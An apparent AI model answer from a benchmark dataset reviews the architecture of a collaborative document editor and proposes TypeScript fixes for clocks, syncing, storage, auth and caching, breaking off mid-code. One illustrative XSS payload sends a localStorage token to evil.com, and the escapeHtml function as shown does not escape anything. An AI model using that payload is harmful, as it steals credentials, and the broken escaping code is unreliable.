4 models have responded to the "Debug This Architecture" challenge. Compare their approaches side-by-side on RIVAL. This response is part of RIVAL's open dataset of 5,600+ AI model responses.
Claude Opus 4 5's response to the 'Debug This Architecture' challenge.
Here's the architecture for a real-time collaborative document editor (like Google Docs): **System Overview:** - Frontend: React SPA with WebSocket connections - Backend: Node.js API servers behind a load balancer (round-robin) - Database: PostgreSQL for document storage, Redis for session cache - Real-time: Each API server maintains its own WebSocket connections to clients - Sync Strategy: Last-write-wins with timestamps from client clocks - Storage: Documents saved as full HTML snapshots every 30 seconds - Auth: JWT tokens with 24-hour expiry, stored in localStorage - CDN: CloudFront for static assets, also caches API responses for 5 minutes **Data Flow:** 1. User types → change event sent via WebSocket to their connected server 2. Server writes change to PostgreSQL 3. Server broadcasts change to all WebSocket clients connected to THAT server 4. Other servers poll PostgreSQL every 2 seconds for changes 5. Conflict resolution: if two users edit the same paragraph, last timestamp wins **Scaling Plan:** - Horizontal scaling by adding more API servers - Database read replicas for read-heavy operations - Document partitioning by organization ID Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs.
This architecture has several critical issues that will cause data loss, poor user experience, and scaling problems. Let me analyze each systematically.
The Problem: Using client clocks for conflict resolution is fundamentally broken. Client clocks can be wrong by hours, days, or even years.
Timeline (Server Time):
10:00:00 - Alice types "Hello" (Alice's clock says 15:00:00)
10:00:01 - Bob types "World" (Bob's clock says 09:00:00)
Result: Alice's edit wins because 15:00:00 > 09:00:00
Bob's edit is silently discarded, even though it came AFTER Alice's
Real-world scenarios that break this:
Solution: Hybrid Logical Clocks (HLC) or Server-Assigned Lamport Timestamps
// Hybrid Logical Clock implementation
interface HLC {
wallTime: number; // Physical time from server
logical: number; // Logical counter for ordering
nodeId: string; // Tie-breaker for simultaneous events
}
class HybridLogicalClock {
private wallTime: number = 0;
private logical: number = 0;
private nodeId: string;
constructor(nodeId: string) {
this.nodeId = nodeId;
}
// Called when sending an event
tick(): HLC {
const now = Date.now();
if (now > this.wallTime) {
this.wallTime = now;
this.logical = 0;
} else {
this.logical++;
}
return { wallTime: this.wallTime, logical: this.logical, nodeId: this.nodeId };
}
// Called when receiving an event
receive(remote: HLC): HLC {
const now = Date.now();
if (now > this.wallTime && now > remote.wallTime) {
this.wallTime = now;
this.logical = 0;
} else if (this.wallTime > remote.wallTime) {
this.logical++;
} else if (remote.wallTime > this.wallTime) {
this.wallTime = remote.wallTime;
this.logical = remote.logical + 1;
} else {
// Equal wall times
this.logical = Math.max(this.logical, remote.logical) + 1;
}
return { wallTime: this.wallTime, logical: this.logical, nodeId: this.nodeId };
}
// Compare two HLCs
static compare(a: HLC, b: HLC): number {
if (a.wallTime !== b.wallTime) return a.wallTime - b.wallTime;
if (a.logical !== b.logical) return a.logical - b.logical;
return a.nodeId.localeCompare(b.nodeId);
}
}
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| HLC | Preserves causality, tolerates clock drift | Slightly more complex, ~24 bytes per timestamp |
| Server timestamps only | Simple | Doesn't capture happens-before relationships |
| Vector clocks | Perfect causality tracking | O(n) space where n = number of clients |
The Problem: When two users edit the same paragraph, one user's work is completely discarded.
Original paragraph: "The quick brown fox"
Alice (10:00:00): Changes to "The quick brown fox jumps"
Bob (10:00:01): Changes to "The slow brown fox"
Result: "The slow brown fox"
Alice's addition of "jumps" is silently lost
Solution: Operational Transformation (OT) or CRDTs
For a Google Docs-like experience, OT is the industry standard:
// Operational Transformation for text
type Operation =
| { type: 'retain'; count: number }
| { type: 'insert'; text: string }
| { type: 'delete'; count: number };
class OTDocument {
private content: string = '';
private revision: number = 0;
// Transform operation A against operation B
// Returns A' such that apply(apply(doc, B), A') === apply(apply(doc, A), B')
static transform(a: Operation[], b: Operation[]): [Operation[], Operation[]] {
const aPrime: Operation[] = [];
const bPrime: Operation[] = [];
let indexA = 0, indexB = 0;
let opA = a[indexA], opB = b[indexB];
while (opA || opB) {
// Insert operations go first
if (opA?.type === 'insert') {
aPrime.push(opA);
bPrime.push({ type: 'retain', count: opA.text.length });
opA = a[++indexA];
continue;
}
if (opB?.type === 'insert') {
bPrime.push(opB);
aPrime.push({ type: 'retain', count: opB.text.length });
opB = b[++indexB];
continue;
}
// Both are retain or delete - handle based on lengths
// ... (full implementation would handle all cases)
}
return [aPrime, bPrime];
}
// Apply operation to document
apply(ops: Operation[]): void {
let index = 0;
let newContent = '';
for (const op of ops) {
switch (op.type) {
case 'retain':
newContent += this.content.slice(index, index + op.count);
index += op.count;
break;
case 'insert':
newContent += op.text;
break;
case 'delete':
index += op.count;
break;
}
}
newContent += this.content.slice(index);
this.content = newContent;
this.revision++;
}
}
// Server-side OT handling
class OTServer {
private document: OTDocument;
private history: Operation[][] = [];
receiveOperation(clientRevision: number, ops: Operation[]): Operation[] {
// Transform against all operations that happened since client's revision
let transformedOps = ops;
for (let i = clientRevision; i < this.history.length; i++) {
const [newOps] = OTDocument.transform(transformedOps, this.history[i]);
transformedOps = newOps;
}
this.document.apply(transformedOps);
this.history.push(transformedOps);
return transformedOps;
}
}
Alternative: CRDTs (Conflict-free Replicated Data Types)
// Simplified RGA (Replicated Growable Array) CRDT for text
interface RGANode {
id: { timestamp: HLC; nodeId: string };
char: string | null; // null = tombstone (deleted)
parent: RGANode['id'] | null;
}
class RGADocument {
private nodes: Map<string, RGANode> = new Map();
private clock: HybridLogicalClock;
constructor(nodeId: string) {
this.clock = new HybridLogicalClock(nodeId);
}
insert(position: number, char: string): RGANode {
const parentId = this.getNodeAtPosition(position - 1)?.id ?? null;
const node: RGANode = {
id: { timestamp: this.clock.tick(), nodeId: this.clock['nodeId'] },
char,
parent: parentId
};
this.nodes.set(this.nodeIdToString(node.id), node);
return node;
}
delete(position: number): void {
const node = this.getNodeAtPosition(position);
if (node) node.char = null; // Tombstone
}
merge(remoteNode: RGANode): void {
const key = this.nodeIdToString(remoteNode.id);
if (!this.nodes.has(key)) {
this.nodes.set(key, remoteNode);
this.clock.receive(remoteNode.id.timestamp);
}
}
getText(): string {
return this.getOrderedNodes()
.filter(n => n.char !== null)
.map(n => n.char)
.join('');
}
private nodeIdToString(id: RGANode['id']): string {
return `${id.timestamp.wallTime}-${id.timestamp.logical}-${id.nodeId}`;
}
private getOrderedNodes(): RGANode[] {
// Topological sort based on parent relationships
// with timestamp as tie-breaker
// ... implementation
}
}
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| OT | Compact operations, well-understood | Requires central server for ordering, complex transform functions |
| CRDT | Decentralized, works offline | Larger metadata overhead, tombstones accumulate |
| Last-write-wins | Simple | Loses data |
Recommendation: Use OT for real-time sync (like Google Docs does) with CRDT for offline support.
The Problem: With round-robin load balancing, users on the same document connect to different servers. Changes only broadcast to clients on the SAME server.
Document: "Project Proposal"
Server A: Server B:
├── Alice (editing) ├── Bob (editing)
└── Charlie (viewing) └── Diana (viewing)
Alice types "Hello" → Charlie sees it immediately
→ Bob and Diana wait up to 2 seconds (polling interval)
This creates a jarring, inconsistent experience where some users see real-time updates and others see delayed updates.
Solution: Redis Pub/Sub for Cross-Server Broadcasting
import Redis from 'ioredis';
import { WebSocket } from 'ws';
class DocumentSyncService {
private redisPub: Redis;
private redisSub: Redis;
private localClients: Map<string, Set<WebSocket>> = new Map();
private serverId: string;
constructor() {
this.serverId = crypto.randomUUID();
this.redisPub = new Redis(process.env.REDIS_URL);
this.redisSub = new Redis(process.env.REDIS_URL);
this.setupSubscriptions();
}
private setupSubscriptions(): void {
this.redisSub.psubscribe('doc:*', (err) => {
if (err) console.error('Failed to subscribe:', err);
});
this.redisSub.on('pmessage', (pattern, channel, message) => {
const documentId = channel.replace('doc:', '');
const parsed = JSON.parse(message);
// Don't re-broadcast our own messages
if (parsed.serverId === this.serverId) return;
this.broadcastToLocalClients(documentId, parsed.payload);
});
}
async publishChange(documentId: string, change: DocumentChange): Promise<void> {
const message = JSON.stringify({
serverId: this.serverId,
payload: change,
timestamp: Date.now()
});
// Publish to Redis for other servers
await this.redisPub.publish(`doc:${documentId}`, message);
// Also broadcast to local clients
this.broadcastToLocalClients(documentId, change);
}
private broadcastToLocalClients(documentId: string, change: DocumentChange): void {
const clients = this.localClients.get(documentId);
if (!clients) return;
const message = JSON.stringify(change);
for (const client of clients) {
if (client.readyState === WebSocket.OPEN) {
client.send(message);
}
}
}
registerClient(documentId: string, ws: WebSocket): void {
if (!this.localClients.has(documentId)) {
this.localClients.set(documentId, new Set());
}
this.localClients.get(documentId)!.add(ws);
ws.on('close', () => {
this.localClients.get(documentId)?.delete(ws);
});
}
}
Alternative: Sticky Sessions with Consistent Hashing
// Nginx configuration for sticky sessions based on document ID
/*
upstream api_servers {
hash $arg_documentId consistent;
server api1:3000;
server api2:3000;
server api3:3000;
}
*/
// Or implement in application load balancer
class DocumentAwareLoadBalancer {
private servers: string[];
private hashRing: ConsistentHashRing;
constructor(servers: string[]) {
this.servers = servers;
this.hashRing = new ConsistentHashRing(servers, 150); // 150 virtual nodes
}
getServerForDocument(documentId: string): string {
return this.hashRing.getNode(documentId);
}
// Handle server failures gracefully
removeServer(server: string): void {
this.hashRing.removeNode(server);
// Clients will reconnect and get routed to new server
}
}
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| Redis Pub/Sub | Decoupled servers, any server can handle any doc | Additional infrastructure, Redis becomes SPOF |
| Sticky sessions | Simpler, no cross-server communication | Uneven load, complex failover |
| Dedicated doc servers | Best performance per document | Complex routing, underutilization |
The Problem: Even with Redis Pub/Sub, the architecture mentions polling PostgreSQL every 2 seconds as a fallback. This creates:
Solution: Event-Driven Architecture with PostgreSQL LISTEN/NOTIFY
import { Pool, Client } from 'pg';
class PostgresChangeNotifier {
private listenerClient: Client;
private pool: Pool;
private handlers: Map<string, Set<(change: any) => void>> = new Map();
async initialize(): Promise<void> {
this.listenerClient = new Client(process.env.DATABASE_URL);
await this.listenerClient.connect();
await this.listenerClient.query('LISTEN document_changes');
this.listenerClient.on('notification', (msg) => {
if (msg.channel === 'document_changes' && msg.payload) {
const change = JSON.parse(msg.payload);
this.notifyHandlers(change.document_id, change);
}
});
}
subscribe(documentId: string, handler: (change: any) => void): () => void {
if (!this.handlers.has(documentId)) {
this.handlers.set(documentId, new Set());
}
this.handlers.get(documentId)!.add(handler);
// Return unsubscribe function
return () => {
this.handlers.get(documentId)?.delete(handler);
};
}
private notifyHandlers(documentId: string, change: any): void {
const handlers = this.handlers.get(documentId);
if (handlers) {
for (const handler of handlers) {
handler(change);
}
}
}
}
// Database trigger to send notifications
/*
CREATE OR REPLACE FUNCTION notify_document_change()
RETURNS TRIGGER AS $$
BEGIN
PERFORM pg_notify(
'document_changes',
json_build_object(
'document_id', NEW.document_id,
'operation_id', NEW.id,
'operation', NEW.operation,
'revision', NEW.revision
)::text
);
RETURN NEW;
END;
$$ LANGUAGE plpgsql;
CREATE TRIGGER document_change_trigger
AFTER INSERT ON document_operations
FOR EACH ROW EXECUTE FUNCTION notify_document_change();
*/
The Problem: If a server crashes, up to 30 seconds of work is lost. For a real-time editor, this is catastrophic.
Timeline:
00:00 - Snapshot saved
00:15 - Alice types 500 words
00:29 - Server crashes
00:30 - Server restarts
Result: Alice's 500 words are gone forever
Solution: Operation Log with Periodic Compaction
interface DocumentOperation {
id: string;
documentId: string;
userId: string;
revision: number;
operation: Operation[]; // OT operations
timestamp: HLC;
checksum: string;
}
class DurableDocumentStore {
private pool: Pool;
private redis: Redis;
async applyOperation(op: DocumentOperation): Promise<void> {
const client = await this.pool.connect();
try {
await client.query('BEGIN');
// 1. Append to operation log (durable)
await client.query(`
INSERT INTO document_operations
(id, document_id, user_id, revision, operation, timestamp, checksum)
VALUES ($1, $2, $3, $4, $5, $6, $7)
`, [op.id, op.documentId, op.userId, op.revision,
JSON.stringify(op.operation), op.timestamp, op.checksum]);
// 2. Update materialized view (for fast reads)
await client.query(`
UPDATE documents
SET current_revision = $1,
last_modified = NOW(),
content = apply_operation(content, $2)
WHERE id = $3 AND current_revision = $4
`, [op.revision, JSON.stringify(op.operation), op.documentId, op.revision - 1]);
await client.query('COMMIT');
// 3. Cache in Redis for real-time sync
await this.redis.xadd(
`doc:${op.documentId}:ops`,
'MAXLEN', '~', '10000', // Keep last ~10k operations
'*',
'data', JSON.stringify(op)
);
} catch (error) {
await client.query('ROLLBACK');
throw error;
} finally {
client.release();
}
}
// Periodic compaction job
async compactDocument(documentId: string): Promise<void> {
const client = await this.pool.connect();
try {
await client.query('BEGIN');
// Get current state
const { rows: [doc] } = await client.query(
'SELECT content, current_revision FROM documents WHERE id = $1 FOR UPDATE',
[documentId]
);
// Create snapshot
await client.query(`
INSERT INTO document_snapshots (document_id, revision, content, created_at)
VALUES ($1, $2, $3, NOW())
`, [documentId, doc.current_revision, doc.content]);
// Delete old operations (keep last 1000 for undo history)
await client.query(`
DELETE FROM document_operations
WHERE document_id = $1
AND revision < $2 - 1000
`, [documentId, doc.current_revision]);
await client.query('COMMIT');
} finally {
client.release();
}
}
// Recover document from operations
async recoverDocument(documentId: string): Promise<string> {
// Find latest snapshot
const { rows: [snapshot] } = await this.pool.query(`
SELECT content, revision FROM document_snapshots
WHERE document_id = $1
ORDER BY revision DESC LIMIT 1
`, [documentId]);
let content = snapshot?.content ?? '';
let fromRevision = snapshot?.revision ?? 0;
// Apply all operations since snapshot
const { rows: operations } = await this.pool.query(`
SELECT operation FROM document_operations
WHERE document_id = $1 AND revision > $2
ORDER BY revision ASC
`, [documentId, fromRevision]);
for (const op of operations) {
content = applyOperation(content, JSON.parse(op.operation));
}
return content;
}
}
Database Schema:
-- Immutable operation log
CREATE TABLE document_operations (
id UUID PRIMARY KEY,
document_id UUID NOT NULL REFERENCES documents(id),
user_id UUID NOT NULL REFERENCES users(id),
revision BIGINT NOT NULL,
operation JSONB NOT NULL,
timestamp JSONB NOT NULL, -- HLC
checksum VARCHAR(64) NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
UNIQUE(document_id, revision)
);
-- Index for efficient replay
CREATE INDEX idx_doc_ops_replay
ON document_operations(document_id, revision);
-- Periodic snapshots for fast recovery
CREATE TABLE document_snapshots (
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
document_id UUID NOT NULL REFERENCES documents(id),
revision BIGINT NOT NULL,
content TEXT NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
UNIQUE(document_id, revision)
);
-- Materialized current state (for fast reads)
CREATE TABLE documents (
id UUID PRIMARY KEY,
title VARCHAR(500),
content TEXT,
current_revision BIGINT DEFAULT 0,
created_at TIMESTAMPTZ DEFAULT NOW(),
last_modified TIMESTAMPTZ DEFAULT NOW()
);
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| Operation log | Zero data loss, full history | Storage grows, need compaction |
| Frequent snapshots | Simple recovery | Still some data loss window |
| Write-ahead log | Database handles durability | Tied to specific database |
The Problem:
Solution: Structured Document Model with Delta Storage
// Structured document model (similar to ProseMirror/Slate)
interface DocumentNode {
type: 'doc' | 'paragraph' | 'heading' | 'list' | 'listItem' | 'text';
content?: DocumentNode[];
text?: string;
marks?: Mark[]; // bold, italic, link, etc.
attrs?: Record<string, any>;
}
interface Mark {
type: 'bold' | 'italic' | 'underline' | 'link' | 'code';
attrs?: Record<string, any>;
}
// Example document
const exampleDoc: DocumentNode = {
type: 'doc',
content: [
{
type: 'heading',
attrs: { level: 1 },
content: [{ type: 'text', text: 'My Document' }]
},
{
type: 'paragraph',
content: [
{ type: 'text', text: 'Hello ' },
{ type: 'text', text: 'world', marks: [{ type: 'bold' }] }
]
}
]
};
// Sanitization on input
class DocumentSanitizer {
private allowedNodeTypes = new Set([
'doc', 'paragraph', 'heading', 'list', 'listItem', 'text',
'blockquote', 'codeBlock', 'image', 'table', 'tableRow', 'tableCell'
]);
private allowedMarks = new Set([
'bold', 'italic', 'underline', 'strike', 'code', 'link'
]);
sanitize(node: DocumentNode): DocumentNode {
if (!this.allowedNodeTypes.has(node.type)) {
// Convert unknown types to paragraph
return { type: 'paragraph', content: this.sanitizeContent(node.content) };
}
return {
type: node.type,
...(node.text && { text: this.sanitizeText(node.text) }),
...(node.content && { content: this.sanitizeContent(node.content) }),
...(node.marks && { marks: this.sanitizeMarks(node.marks) }),
...(node.attrs && { attrs: this.sanitizeAttrs(node.type, node.attrs) })
};
}
private sanitizeText(text: string): string {
// Remove any potential script injections
return text.replace(/<[^>]*>/g, '');
}
private sanitizeMarks(marks: Mark[]): Mark[] {
return marks.filter(m => this.allowedMarks.has(m.type));
}
private sanitizeAttrs(nodeType: string, attrs: Record<string, any>): Record<string, any> {
const sanitized: Record<string, any> = {};
switch (nodeType) {
case 'heading':
sanitized.level = Math.min(6, Math.max(1, parseInt(attrs.level) || 1));
break;
case 'link':
// Only allow safe URL schemes
if (attrs.href && /^https?:\/\//.test(attrs.href)) {
sanitized.href = attrs.href;
}
break;
case 'image':
if (attrs.src && /^https?:\/\//.test(attrs.src)) {
sanitized.src = attrs.src;
sanitized.alt = String(attrs.alt || '').slice(0, 500);
}
break;
}
return sanitized;
}
}
// Render to HTML only on output
class DocumentRenderer {
render(node: DocumentNode): string {
switch (node.type) {
case 'doc':
return node.content?.map(n => this.render(n)).join('') ?? '';
case 'paragraph':
return `<p>${this.renderContent(node)}</p>`;
case 'heading':
const level = node.attrs?.level ?? 1;
return `<h${level}>${this.renderContent(node)}</h${level}>`;
case 'text':
let text = this.escapeHtml(node.text ?? '');
for (const mark of node.marks ?? []) {
text = this.applyMark(text, mark);
}
return text;
default:
return this.renderContent(node);
}
}
private escapeHtml(text: string): string {
return text
.replace(/&/g, '&')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/"/g, '"');
}
private applyMark(text: string, mark: Mark): string {
switch (mark.type) {
case 'bold': return `<strong>${text}</strong>`;
case 'italic': return `<em>${text}</em>`;
case 'code': return `<code>${text}</code>`;
case 'link': return `<a href="${this.escapeHtml(mark.attrs?.href ?? '')}">${text}</a>`;
default: return text;
}
}
}
The Problem: Any XSS vulnerability (from user content, third-party scripts, browser extensions) can steal tokens.
// Attacker's XSS payload
fetch('https://evil.com/steal', {
method: 'POST',
body: localStorage.getItem('token')
});
// Attacker now has 24-hour access to victim's account
Solution: HTTP-Only Cookies with Proper Security Flags
// Server-side: Set secure cookies
import { Response } from 'express';
class AuthService {
setAuthCookies(res: Response, tokens: { accessToken: string; refreshToken: string }): void {
// Access token - short lived, used for API calls
res.cookie('access_token', tokens.accessToken, {
httpOnly: true, // Not accessible via JavaScript
secure: true, // HTTPS only
sameSite: 'strict', // CSRF protection
maxAge: 15 * 60 * 1000, // 15 minutes
path: '/api' // Only sent to API routes
});
// Refresh token - longer lived, only sent to refresh endpoint
res.cookie('refresh_token', tokens.refreshToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 7 * 24 * 60 * 60 * 1000, // 7 days
path: '/api/auth/refresh' // Only sent to refresh endpoint
});
// CSRF token - readable by JavaScript, verified on state-changing requests
const csrfToken = crypto.randomBytes(32).toString('hex');
res.cookie('csrf_token', csrfToken, {
httpOnly: false, // Readable by JavaScript
secure: true,
sameSite: 'strict',
maxAge: 15 * 60 * 1000
});
}
}
// Middleware to verify CSRF token
function csrfProtection(req: Request, res: Response, next: NextFunction): void {
if (['POST', 'PUT', 'DELETE', 'PATCH'].includes(req.method)) {
const cookieToken = req.cookies.csrf_token;
const headerToken = req.headers['x-csrf-token'];
if (!cookieToken || !headerToken || cookieToken !== headerToken) {
return res.status(403).json({ error: 'Invalid CSRF token' });
}
}
next();
}
// Client-side: Include CSRF token in requests
class ApiClient {
private getCsrfToken(): string {
return document.cookie
.split('; ')
.find(row => row.startsWith('csrf_token='))
?.split('=')[1] ?? '';
}
async request(url: string, options: RequestInit = {}): Promise<Response> {
return fetch(url, {
...options,
credentials: 'include', // Include cookies
headers: {
...options.headers,
'X-CSRF-Token': this.getCsrfToken()
}
});
}
}
WebSocket Authentication:
// WebSocket connections need special handling since they don't send cookies automatically
class SecureWebSocketServer {
handleUpgrade(request: IncomingMessage, socket: Socket, head: Buffer): void {
// Option 1: Verify cookie on upgrade
const cookies = this.parseCookies(request.headers.cookie ?? '');
const accessToken = cookies.access_token;
try {
const payload = this.verifyToken(accessToken);
this.wss.handleUpgrade(request, socket, head, (ws) => {
(ws as any).userId = payload.userId;
this.wss.emit('connection', ws, request);
});
} catch (error) {
socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
socket.destroy();
}
}
// Option 2: Ticket-based authentication
async generateWebSocketTicket(userId: string): Promise<string> {
const ticket = crypto.randomBytes(32).toString('hex');
// Store ticket with short expiry
await this.redis.setex(`ws_ticket:${ticket}`, 30, userId);
return ticket;
}
async validateTicket(ticket: string): Promise<string | null> {
const userId = await this.redis.get(`ws_ticket:${ticket}`);
if (userId) {
await this.redis.del(`ws_ticket:${ticket}`); // One-time use
}
return userId;
}
}
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| HTTP-only cookies | XSS-resistant | Need CSRF protection, more complex |
| localStorage + fingerprinting | Simpler | Vulnerable to XSS |
| Session IDs only | Most secure | Requires server-side session store |
The Problem: If a token is compromised, the attacker has 24 hours of access. For a document editor with sensitive content, this is too risky.
Solution: Short-Lived Access Tokens with Refresh Token Rotation
class TokenService {
private readonly ACCESS_TOKEN_EXPIRY = '15m';
private readonly REFRESH_TOKEN_EXPIRY = '7d';
async generateTokenPair(userId: string): Promise<TokenPair> {
const tokenFamily = crypto.randomUUID();
const accessToken = jwt.sign(
{ userId, type: 'access' },
process.env.JWT_SECRET!,
{ expiresIn: this.ACCESS_TOKEN_EXPIRY }
);
const refreshToken = jwt.sign(
{ userId, type: 'refresh', family: tokenFamily },
process.env.JWT_REFRESH_SECRET!,
{ expiresIn: this.REFRESH_TOKEN_EXPIRY }
);
// Store refresh token hash for revocation
await this.redis.setex(
`refresh:${tokenFamily}`,
7 * 24 * 60 * 60,
JSON.stringify({
userId,
tokenHash: this.hashToken(refreshToken),
createdAt: Date.now()
})
);
return { accessToken, refreshToken };
}
async refreshTokens(refreshToken: string): Promise<TokenPair | null> {
try {
const payload = jwt.verify(refreshToken, process.env.JWT_REFRESH_SECRET!) as any;
// Check if token family is still valid
const storedData = await this.redis.get(`refresh:${payload.family}`);
if (!storedData) {
// Token family was revoked - possible token theft!
await this.revokeAllUserSessions(payload.userId);
return null;
}
const stored = JSON.parse(storedData);
// Verify token hash matches
if (stored.tokenHash !== this.hashToken(refreshToken)) {
// Token reuse detected - revoke family
await this.redis.del(`refresh:${payload.family}`);
await this.revokeAllUserSessions(payload.userId);
return null;
}
// Generate new token pair (rotation)
const newTokens = await this.generateTokenPair(payload.userId);
// Invalidate old family
await this.redis.del(`refresh:${payload.family}`);
return newTokens;
} catch (error) {
return null;
}
}
private hashToken(token: string): string {
return crypto.createHash('sha256').update(token).digest('hex');
}
async revokeAllUserSessions(userId: string): Promise<void> {
// In production, use a more efficient approach with user-specific key patterns
const keys = await this.redis.keys('refresh:*');
for (const key of keys) {
const data = await this.redis.get(key);
if (data && JSON.parse(data).userId === userId) {
await this.redis.del(key);
}
}
}
}
The Problem: The architecture doesn't mention access control. Can any authenticated user access any document?
Solution: Document Permission System
enum Permission {
VIEW = 'view',
COMMENT = 'comment',
EDIT = 'edit',
ADMIN = 'admin'
}
interface DocumentAccess {
documentId: string;
principalType: 'user' | 'group' | 'organization' | 'public';
principalId: string | null; // null for public
permission: Permission;
}
class DocumentAuthorizationService {
private cache: Redis;
private pool: Pool;
async checkPermission(
userId: string,
documentId: string,
requiredPermission: Permission
): Promise<boolean> {
// Check cache first
const cacheKey = `authz:${userId}:${documentId}`;
const cached = await this.cache.get(cacheKey);
if (cached) {
return this.permissionSatisfies(cached as Permission, requiredPermission);
}
// Query database
const effectivePermission = await this.getEffectivePermission(userId, documentId);
// Cache for 5 minutes
if (effectivePermission) {
await this.cache.setex(cacheKey, 300, effectivePermission);
}
return this.permissionSatisfies(effectivePermission, requiredPermission);
}
private async getEffectivePermission(
userId: string,
documentId: string
): Promise<Permission | null> {
const { rows } = await this.pool.query(`
WITH user_groups AS (
SELECT group_id FROM group_members WHERE user_id = $1
),
user_org AS (
SELECT organization_id FROM users WHERE id = $1
)
SELECT permission FROM document_access
WHERE document_id = $2
AND (
(principal_type = 'user' AND principal_id = $1)
OR (principal_type = 'group' AND principal_id IN (SELECT group_id FROM user_groups))
OR (principal_type = 'organization' AND principal_id = (SELECT organization_id FROM user_org))
OR (principal_type = 'public')
)
ORDER BY
CASE permission
WHEN 'admin' THEN 4
WHEN 'edit' THEN 3
WHEN 'comment' THEN 2
WHEN 'view' THEN 1
END DESC
LIMIT 1
`, [userId, documentId]);
return rows[0]?.permission ?? null;
}
private permissionSatisfies(has: Permission | null, needs: Permission): boolean {
if (!has) return false;
const hierarchy: Record<Permission, number> = {
[Permission.VIEW]: 1,
[Permission.COMMENT]: 2,
[Permission.EDIT]: 3,
[Permission.ADMIN]: 4
};
return hierarchy[has] >= hierarchy[needs];
}
// Invalidate cache when permissions change
async invalidateDocumentCache(documentId: string): Promise<void> {
const keys = await this.cache.keys(`authz:*:${documentId}`);
if (keys.length > 0) {
await this.cache.del(...keys);
}
}
}
// Middleware
function requirePermission(permission: Permission) {
return async (req: Request, res: Response, next: NextFunction) => {
const { documentId } = req.params;
const userId = req.user!.id;
const hasPermission = await authzService.checkPermission(
userId,
documentId,
permission
);
if (!hasPermission) {
return res.status(403).json({ error: 'Insufficient permissions' });
}
next();
};
}
// Usage
app.get('/api/documents/:documentId', requirePermission(Permission.VIEW), getDocument);
app.put('/api/documents/:documentId', requirePermission(Permission.EDIT), updateDocument);
app.delete('/api/documents/:documentId', requirePermission(Permission.ADMIN), deleteDocument);
The Problem: Caching API responses for collaborative documents is fundamentally broken:
10:00:00 - Alice requests document, CDN caches response
10:00:30 - Bob edits document
10:04:59 - Alice requests document again, gets stale cached version
Alice sees version from 5 minutes ago!
Solution: Proper Cache Control Headers
class CacheControlMiddleware {
// Never cache document content or real-time data
static noCache(req: Request, res: Response, next: NextFunction): void {
res.set({
'Cache-Control': 'no-store, no-cache, must-revalidate, proxy-revalidate',
'Pragma': 'no-cache',
'Expires': '0',
'Surrogate-Control': 'no-store'
});
next();
}
// Cache static assets aggressively
static staticAssets(req: Request, res: Response, next: NextFunction): void {
res.set({
'Cache-Control': 'public, max-age=31536000, immutable'
});
next();
}
// Cache user-specific data privately with revalidation
static privateWithRevalidation(maxAge: number) {
return (req: Request, res: Response, next: NextFunction) => {
res.set({
'Cache-Control': `private, max-age=${maxAge}, must-revalidate`,
'Vary': 'Authorization, Cookie'
});
next();
};
}
// Cache public data with ETag validation
static publicWithEtag(req: Request, res: Response, next: NextFunction): void {
res.set({
'Cache-Control': 'public, max-age=0, must-revalidate',
'Vary': 'Accept-Encoding'
});
next();
}
}
// Apply to routes
app.use('/api/documents/:id/content', CacheControlMiddleware.noCache);
app.use('/api/documents/:id/operations', CacheControlMiddleware.noCache);
app.use('/api/users/me', CacheControlMiddleware.privateWithRevalidation(60));
app.use('/api/documents', CacheControlMiddleware.publicWithEtag); // List with ETags
app.use('/static', CacheControlMiddleware.staticAssets);
What CAN be cached:
// Safe to cache:
// 1. Static assets (JS, CSS, images) - with content hash in filename
// 2. User profile data - short TTL, private
// 3. Document metadata (title, last modified) - with ETag validation
// 4. Organization/team data - short TTL
// CloudFront configuration
const cloudFrontBehaviors = {
'/static/*': {
TTL: 31536000, // 1 year
compress: true,
headers: ['Origin']
},
'/api/documents/*/content': {
TTL: 0, // Never cache
forwardCookies: 'all',
forwardHeaders: ['Authorization']
},
'/api/*': {
TTL: 0,
forwardCookies: 'all',
forwardHeaders: ['Authorization', 'X-CSRF-Token']
}
};
The Problem: Using PostgreSQL for real-time sync creates:
100 users typing at 5 chars/second = 500 writes/second
1000 users = 5000 writes/second
PostgreSQL will struggle, and latency will spike
Solution: Tiered Storage Architecture
class TieredDocumentStorage {
private redis: Redis;
private pool: Pool;
private operationBuffer: Map<string, DocumentOperation[]> = new Map();
private flushInterval: NodeJS.Timeout;
constructor() {
// Flush buffered operations every 100ms
this.flushInterval = setInterval(() => this.flushBuffers(), 100);
}
async applyOperation(op: DocumentOperation): Promise<void> {
// Layer 1: Immediate - Redis for real-time sync
await this.redis.multi()
.xadd(
`doc:${op.documentId}:ops`,
'MAXLEN', '~', '1000',
'*',
'data', JSON.stringify(op)
)
.publish(`doc:${op.documentId}`, JSON.stringify(op))
.exec();
// Layer 2: Buffered - Batch writes to PostgreSQL
if (!this.operationBuffer.has(op.documentId)) {
this.operationBuffer.set(op.documentId, []);
}
this.operationBuffer.get(op.documentId)!.push(op);
}
private async flushBuffers(): Promise<void> {
const buffers = new Map(this.operationBuffer);
this.operationBuffer.clear();
for (const [documentId, operations] of buffers) {
if (operations.length === 0) continue;
try {
await this.batchInsertOperations(operations);
} catch (error) {
// Re-queue failed operations
const existing = this.operationBuffer.get(documentId) ?? [];
this.operationBuffer.set(documentId, [...operations, ...existing]);
console.error(`Failed to flush operations for ${documentId}:`, error);
}
}
}
private async batchInsertOperations(operations: DocumentOperation[]): Promise<void> {
const values = operations.map((op, i) => {
const offset = i * 7;
return `($${offset + 1}, $${offset + 2}, $${offset + 3}, $${offset + 4}, $${offset + 5}, $${offset + 6}, $${offset + 7})`;
}).join(', ');
const params = operations.flatMap(op => [
op.id, op.documentId, op.userId, op.revision,
JSON.stringify(op.operation), JSON.stringify(op.timestamp), op.checksum
]);
await this.pool.query(`
INSERT INTO document_operations
(id, document_id, user_id, revision, operation, timestamp, checksum)
VALUES ${values}
ON CONFLICT (document_id, revision) DO NOTHING
`, params);
}
// Recovery: Rebuild from PostgreSQL if Redis data is lost
